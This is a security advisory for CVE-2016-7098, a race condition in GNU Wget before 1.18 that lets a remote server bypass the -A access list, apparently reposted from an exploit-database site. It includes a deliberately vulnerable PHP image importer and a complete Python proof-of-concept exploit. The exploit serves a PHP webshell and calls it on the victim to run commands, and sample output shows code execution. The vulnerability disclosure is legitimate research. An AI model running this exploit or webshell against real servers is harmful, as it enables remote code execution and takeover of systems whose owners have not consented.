GNU Wget < 1.18 - Access List Bypass / Race Condition

2016.11.25
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

''' ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html - CVE-2016-7098 - Release date: 24.11.2016 - Revision 1.0 - Severity: Medium ============================================= I. VULNERABILITY ------------------------- GNU Wget < 1.18 Access List Bypass / Race Condition II. BACKGROUND ------------------------- "GNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols. It is a non-interactive commandline tool, so it may easily be called from scripts, cron jobs, terminals without X-Windows support, etc. GNU Wget has many features to make retrieving large files or mirroring entire web or FTP sites easy " https://www.gnu.org/software/wget/ III. INTRODUCTION ------------------------- GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, is affected by a Race Condition vulnerability that might allow remote attackers to bypass intended wget access list restrictions specified with -A parameter. This might allow attackers to place malicious/restricted files onto the system. Depending on the application / download directory, this could potentially lead to other vulnerabilities such as code execution etc. IV. DESCRIPTION ------------------------- When wget is used in recursive/mirroring mode, according to the manual it can take the following access list options: "Recursive Accept/Reject Options: -A acclist --accept acclist -R rejlist --reject rejlist Specify comma-separated lists of file name suffixes or patterns to accept or reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in an element of acclist or rejlist, it will be treated as a pattern, rather than a suffix." These can for example be used to only download JPG images. It was however discovered that when a single file is requested with recursive option (-r / -m) and an access list ( -A ), wget only applies the checks at the end of the download process. This can be observed in the output below: # wget -r -nH -A '*.jpg' http://attackersvr/test.php Resolving attackersvr... 192.168.57.1 Connecting to attackersvr|192.168.57.1|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘test.php’ 15:05:46 (27.3 B/s) - ‘test.php’ saved [52] Removing test.php since it should be rejected. FINISHED Although wget deletes the file at the end of the download process, this creates a race condition as an attacker with control over the URL/remote server could intentionally slow down the download process so that they had a chance to make use of the malicious file before it gets deleted. It is very easy to win the race as the file only gets deleted after the HTTP connection is terminated. The attacker could therefore keep the connection open as long as it was necessary to make use of the uploaded file as demonstrated in the proof of concept below. V. PROOF OF CONCEPT EXPLOIT ------------------------------ Here is a simple vulnerable PHP web application that uses wget to download images from a user-provided server/URL: ---[ image_importer.php ]--- <?php // Vulnerable webapp [image_importer.php] // Uses wget to import user images from provided site URL // It only accepts JPG files (-A wget option). if ( isset($_GET['imgurl']) ) { $URL = escapeshellarg($_GET['imgurl']); } else { die("imgurl parameter missing"); } if ( !file_exists("image_uploads") ) { mkdir("image_uploads"); } // Download user JPG images into /image_uploads directory system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1"); ?> ---------------------------- For example: https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg will cause wget to upload logo.jpg file into: https://victimsvr/images_uploads/logo.jpg The wget access list (-A) is to ensure that only .jpg files get uploaded. However due to the wget race condition vulnerability an attacker could use the exploit below to upload an arbitrary PHP script to /image_uploads directory and achieve code execution. ---[ wget-race-exploit.py ]--- ''' #!/usr/bin/env python # # Wget < 1.18 Access List Bypass / Race Condition PoC Exploit # CVE-2016-7098 # # Dawid Golunski # https://legalhackers.com # # # This PoC wget exploit can be used to bypass wget -A access list and upload a malicious # file for long enough to take advantage of it. # The exploit sets up a web server on port 80 and waits for a download request from wget. # It then supplies a PHP webshell payload and requests the uploaded file before it gets # removed by wget. # # Adjust target URL (WEBSHELL_URL) before executing. # # Full advisory at: # # https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html # # Disclaimer: # # For testing purposes only. Do no harm. # # import SimpleHTTPServer import time import SocketServer import urllib2 import sys HTTP_LISTEN_IP = '0.0.0.0' HTTP_LISTEN_PORT = 80 PAYLOAD=''' <?php //our webshell system($_GET["cmd"]); system("touch /tmp/wgethack"); ?> ''' # Webshell URL to be requested before the connection is closed # i.e before the uploaded "temporary" file gets removed. WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php" # Command to be executed through 'cmd' GET paramter of the webshell CMD="/usr/bin/id" class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): # Send the payload on GET request print "[+] Got connection from wget requesting " + self.path + " via GET :)\n" self.send_response(200) self.send_header('Content-type', 'text/plain') self.end_headers() self.wfile.write(PAYLOAD) print "\n[+] PHP webshell payload was sent.\n" # Wait for the file to be flushed to disk on remote host etc. print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n" time.sleep(2) # Request uploaded webshell print "[+} File '" + self.path + "' should be saved by now :)\n" print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n" print "[+} Command result: " print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read() print "[+} All done. Closing HTTP connection...\n" # Connection will be closed on request handler return return handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n" print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT handler.serve_forever() ''' ------------------------------ If the attacker run this exploit on their server ('attackersver') and pointed the vulnerable script image_importer.php at it via URL: https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php The attacker will see output similar to: root@attackersvr:~# ./wget-race-exploit.py Wget < 1.18 Access List Bypass / Race Condition PoC Exploit CVE-2016-7098 Dawid Golunski https://legalhackers.com [+} Exploit Web server started on HTTP port 80. Waiting for wget to connect... [+] Got connection from wget requesting /webshell.php via GET :) victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 - [+] PHP webshell payload was sent. [+} Sleep for 2s to make sure the file has been flushed to the disk on the target... [+} File '/webshell.php' should be saved by now :) [+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id [+} Command result: uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd) [+} All done. Closing HTTP connection... VI. BUSINESS IMPACT ------------------------- The vulnerability might allow remote servers to bypass intended wget access list restrictions to temporarily store a malicious file on the server. In certain cases, depending on the context wget command was used in and download path, this issue could potentially lead to other vulnerabilities such as script execution as shown in the PoC section. VII. SYSTEMS AFFECTED ------------------------- Wget < 1.18 VIII. SOLUTION ------------------------- Update to latest version of wget 1.18 or apply patches provided by the vendor. IX. REFERENCES ------------------------- https://legalhackers.com https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py https://www.gnu.org/software/wget/ https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098 https://security-tracker.debian.org/tracker/CVE-2016-7098 http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098 X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com XI. REVISION HISTORY ------------------------- 24.11.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. '''

References:

https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top